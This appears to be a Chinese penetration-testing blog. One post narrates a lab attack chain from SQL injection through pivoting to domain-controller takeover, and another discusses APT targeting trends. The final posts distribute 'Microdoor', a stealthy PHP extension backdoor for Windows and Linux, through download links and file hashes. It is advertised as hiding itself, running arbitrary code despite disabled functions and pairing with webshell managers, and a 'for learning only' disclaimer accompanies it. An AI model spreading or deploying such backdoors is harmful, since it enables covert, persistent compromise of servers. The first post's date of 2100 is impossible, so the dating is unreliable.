2100年12月29日星期三

为什么会有这个博客

渗透攻击超十年,由于年龄,身体原因,自己感觉快要退出一线渗透攻击了。遂打算把毕生所学用文字表写出来。因为文章涉及到敏感的攻击行为,所以好多需要打马赛克,或者是本地以demo的形式表现出来。当这个行业做久了,你也终有一天发现原来事物的本质是如此重要。比如内网渗透的本质是信息搜集。当年某大佬把这条经验传递给我,同样,今天变成老家伙的我,也希望把这条经验传递下去。
文中一定会出现笔误或者不对的地方,请大家多多包涵,提前向各位说声对不起,所有课程从基础开始(包括工具的介绍,应用等),这样以后新来的同学或者想要自我从头学习的同学也可以避开一些弯路,在写的过程中,我深深体会到分享者才是学习中的最大受益者,由于需要成文章,所以需要查阅大量的资料。在整个过程中,又学习到很多知识点。连载其中包括穿插在工作中的项目心得笔记,包括但不限制于代码审计,web渗透,内网渗透,域渗透,隧道介绍,日志溯源与暴力溯源等。如果有课程指定需求介绍相关技术的同事(在我技术能力范围之内),请发我的邮箱:micropoor@gmail.com,由于博客可能非人为因素被停止更新,本博客所有的文章都转自我的另一个博客https://micropoor.blogspot.com。
在2010-2012年之间一直在写<PHP安全新闻早8点>,但是由于当时的工作原因,就不在写了。我于2011年离开这个圈子,到另一个圈子,于2016年末回归到这个圈子,发现这个圈子的精神变了,或者我跟不上潮流了,或者我掉队了。可能技术一旦与钱挂钩,技术可以快速变现的时候,那么它的味道就会变吧。这次的所有课程无版权,只希望自己可以在本来已封闭的技术氛围里,依然做出一些技术文档输出。那么这次的教程我想依然想叫<PHP安全新闻早8点>



2017-11-17
Micropoor

2018年9月5日星期三

渗透,持续渗透,后渗透的本质

转载请标注作者Micropoor以及文章来源,https://micropoor.blogspot.com/。
引言(1):
        目标资产信息搜集的广度,决定渗透过程的复杂程度。
        目标主机信息搜集的深度,决定后渗透权限持续把控。
        渗透的本质是信息搜集,而信息搜集整理为后续的情报跟进提供了强大的保证。
        持续渗透的本质是线索关联,而线索关联为后续的攻击链方提供了强大的方向。
        后渗透的本质是权限把控,而权限把控为后渗透提供了以牺牲时间换取空间强大基础。

靶机背景介绍:


主机A1:CentOs x64 全补丁,无提权漏洞,可互联网
主机A2:Windows 2008 x64 全补丁  无提权漏洞,脱网机
主机B:  Windows 2008 x64 全补丁  无提权漏洞,域内主机,脱网机
主机C:  Windows 2008 x64 域控,存在ms14-068漏洞,脱网机
且A1,A2,B,C系统主机密码均为强口令

A1,A2,B,C为标准ABC类网,允许访问流程,A1---->A2---->B---->C,不允许跨主机访问。(请注意每个主机的对应IP段)

整体攻击流程图:

模拟开始攻击:

扫描主机A1对攻击机开放端口:80,22


扫描主机A1-Web目录结构:


主机A1-Web搜索处存在sql注入:


登录后台得到shell:


生成tcp payload 以php一句话执行:



A1对内信息搜集发现A2,并且针对A1,没有可用提权漏洞(Web非root权限),放弃提权:


以A1作为跳板添加虚拟路由,并且开始做针对A2的对内信息搜集:



以A1跳板发现A2部署weblogic,并且存在漏洞。转发目标机7001至本地,利用漏洞。




发现A2全补丁,放弃提权,(weblogic为user权限)对内信息刺探A2,得到weblogic相关配置文件,解密后,得到密码。


尝试做二级跳板,以weblogic相关配置,尝试对B(域内成员)的渗透(SMB)



获取B权限(system),尝试对内B的本身信息搜集,发现域账号(普通成员)user1.


引言(2):
          渗透测试过程,提权是非核心任务,这里也不建议尝试提权,因为在实战过程中获取某个“点”的权限,过程是及其漫长以及困难的,不要因为某个大胆的尝试,而影响了整个渗透测试流程。


尝试三级跳板,尝试获取sid,以及域控对内相关IP,尝试越权,获取域控权限。






并没有结束:在得到域控后,对主机C对内信息搜集,得到域控administrator密码,尝试用该密码ssh--->A1,成功,root权限。

广告(你需要背下来的广告词):只要是“一个人”设置的密码“群”,一定有大的规律,只要是“一个行业”设置的密码“群”一定有规律可寻。

引言(4):
       渗透的本质是信息搜集,而要把信息搜集发挥最大效果,一定是离不开“线索关联”,而信息搜集,无论是对内,对外,更或者是主动信息搜集,被动信息搜集。如何把目标A与B的信息搜集,整理后做“线索关联”是一个非常有趣的工作。

后者的话:
         APT攻击三大要素,既:
               攻击手段复杂,持续时间长,高危害性
         APT攻击主要分类为两大类,既:
                高级持续渗透 , 即时渗透





APT两大类攻击核心诉求区别:



在做调研之前,作者一直以为越发达的城市,或者越政治中心的城市是发生攻击的高发地,但是在调研后,打破了我之前的想法,于是作者深入调研原因究竟,以便更好的了解企业安全建设的规划。




      在针对政府机构的攻击中,APT组织除了会攻击一般的政府机构外,还有专门针对公检法的攻击。
       在针对能源行业的攻击中,APT组织重点关注的领域依次是:石油、天然气和核能。针对能源行业的攻击,对国家安全具有很大的影响。
       在针对金融行业的攻击中,APT组织最为关注的是银行,其次是证券、互联网金融等。还有部分APT组织会关注到与虚拟数字货币(如比特币、门罗币等)相关的机构或公司。针对金融机构的攻击大多会利用安全漏洞。针对ATM自动取款机的攻击也一直延续了2016年的活跃状态。
      还有一点值得注意:APT组织的攻击虽然具有很强的针对性,但其攻击目标也并不一定是单一的。有的APT组织只攻击特定国家特定领域的目标(仅从目前已经披露的情况看),但也有很多APT组织会对多个国家的不同领域目标展开攻击。上图给出了2017年全球各国研究机构发布的APT研究报告中,披露APT组织攻击目标的所属国家、领域数量分析。

引言(5):

         目前市场上的企业网络安全规划与建设大部分存在统一实施方案,或者是模板方案。而非针对特定行业,特定客户群体来制定针对方案。而不同行业,不同背景的企业安全规划方案也一定是不相同的。如传统行业(医药,食品,汽车)对待企业安全的建设是起跑阶段。如金融行业(证券,银行,保险)对待企业安全的建设是规划与实施阶段。如互联网行业(某度,某巴,某鹅)对待企业安全建设是自研或商业化阶段。为了更好的了解,所以如上制图,更能清楚的看到,未来企业网络安全对待企业发展的重要性,以及特定行业特定规划方案,特定行业特定防御对象。如某X企业安全预算为100万,是否应该针对该企业,行业,地理位置,做防御预算倾斜,并且留有10%-15%的资金量做2月,3月,11月攻击高发期的预案资金等。


总结:

         由于信息化,自动化的办公,企业成本的考虑,传统的“以点打面”的点会越来越分散与难以集中管理,如跨国办公,移动办公等。那么可预知的攻击方式将会以人为突破口的事越来越多。安全的本质又不能仅仅靠预算与设备的投入而杜绝,尤其是在未来的大型甲方公司,都会有着自己的安全团队,那么如何把网络安全发展成未来甲方公司的企业文化,将会是一个漫长的过程。而近些年无论是国内还是国外的官方部门开始重视网络安全,但是效果不明显,这里做一个总结,同样部分也适用于企业:


2018年5月27日星期日

优化更新 php backdoor for windows

所有Microdoor系列仅供学习,通过了解相关原理,来做自身安全与防护。切勿非法使用。

Microdoor for php 作为backdoor,更为隐蔽,所有调用以及代码任意执行,都调用内核函数,php禁用执行函数依然可以执行任意php代码。无缝连接菜刀,以及第三方渗透框架。并且在phpinfo,以及php -m 隐藏自身。旨意通过了解相关原理,做好相关安全防护。

更新支持php 5.4.x for windows
更新php-5.6.36 for windows 的部分bug。

php-5.6.36 backdoor for windows

micropoor_php5.6.x_x86.dll
SIZE: 188416 字节 MD5: 1EEF918B0D873316D39117F62C6A4819 SHA1: 944EFD5DB064FF412D1D7874FEC719F14382E2F1 CRC32: F9D03401
备注:micropoor_php5.6.x_x86.dll仅适用x32位php-5.6.36 for Windows 的Microdoor。不适用其他版本。
为防止原文件被篡改,使用前,请对比文件MD5值。
https://drive.google.com/file/d/19aJIIBKyTItUWkizGdupWJnHy7eUvrUC/view



php-5.4.x backdoor for windows

micropoor_php5.4.x_x86.dll
SIZE: 68608 字节 MD5: 457A72A45CBD06D8F4ECAB2C6A8B7426 SHA1: D922C4A9C79FB250F2BD0F426BD5124C38C9716E CRC32: 560188D7
备注:micropoor_php5.4.x_x86.dll仅适用x32位micropoor_php5.4.x_x86.dll for Windows 的Microdoor。不适用其他版本。
为防止原文件被篡改,使用前,请对比文件MD5值。
https://drive.google.com/file/d/1bIT9LSyeXxJa4qxKBYjPro784DEr3swG/view



2018年5月11日星期五

PHP all kernel versions for backdoor

所有Microdoor系列仅供学习,通过了解相关原理,来做自身安全与防护。切勿非法使用。

Microdoor for php 作为backdoor,更为隐蔽,所有调用以及代码任意执行,都调用内核函数,php禁用执行函数依然可以执行任意php代码。无缝连接菜刀,以及第三方渗透框架。并且在phpinfo,以及php -m 隐藏自身。旨意通过了解相关原理,做好相关安全防护。

How to install?






php5.x x64 backdoor for linux
public_x64.so
Size: 26800 bytes
MD5: 1C21BD02D26E9A3914A9A7248B799715
SHA1: 934D577EDBCBC6FEB93AA52DE2C195BE59269B77
CRC32: 8145921D
备注:public_x64.so仅适用x64位php5.x for Linux 的Microdoor。不适用其他版本。
为防止原文件被篡改,使用前,请对比文件MD5值。
https://drive.google.com/file/d/1qDYcGuODAUOWF8rKGw4okQ34TyBK9vBh/view?usp=sharing
php5.x x32 backdoor for linux
public_x32.so
Size: 26127 bytes
MD5: 9BF67665FDCB30C355358624DBEB79BB
SHA1: 3E996D33F18C1E34600203E8C348988449865888
CRC32: 54264834
备注:public_x32.so仅适用x32位 php5.x for Linux的Microdoor。不适用其他版本。
为防止原文件被篡改,使用前,请对比文件MD5值。
https://drive.google.com/file/d/1hF0ZRlz7qZCrWShPNSIumIhlR-pjAx34/view?usp=sharing
php5.x x32 backdoor for windows
public_x86.dll
Size: 68608 bytes
MD5: F5FAF58A15ADC9946A3C34220653DB21
SHA1: 70CA2B9F7ACDADDE0A8A20702EAA897B8EEB43E2
CRC32: 306CDD73
备注:public_x86.dll仅适用x32位php5.x for Windows 的Microdoor。不适用其他版本。
为防止原文件被篡改,使用前,请对比文件MD5值。
https://drive.google.com/file/d/1b_TYaV2gfM6_iJLNx-61qQRUskwwh4dR/view?usp=sharing
PHP7.X x32 for linux
public_x32_7.x.so
Size: 40188 字节
MD5: 472BBC6A3673D7C0C234A5494FDF0A92
SHA1: BCB760BDEB34972E540121591E95866AED78066E
CRC32: 9F17393A
备注:public_x32_7.x.so仅适用x32位 php7.x for Linux的Microdoor。不适用其他版本。
为防止原文件被篡改,使用前,请对比文件MD5值。
https://drive.google.com/file/d/1UJYyKTZ-LZpSUvmRq_Gg3oI_Sn0Q8YZN/view
PHP7.X x64 for linux
public_x64_7.x.so
Size: 42000 字节
MD5: B5370B1C04C5D6E7A3586BFF262BAF19
SHA1: A1F58D3A7DA18C1184CA3C1CD225D5D353231FC0
CRC32: A4BA02C1
备注:public_x64_7.x.so仅适用x64位 php7.x for Linux的Microdoor。不适用其他版本。
为防止原文件被篡改,使用前,请对比文件MD5值。
https://drive.google.com/file/d/1WkQInZQ53PHe104MKHqFOG_-ydCZh4lN/view




注:部分windows dll版,如果有需求的话,未来编译发布。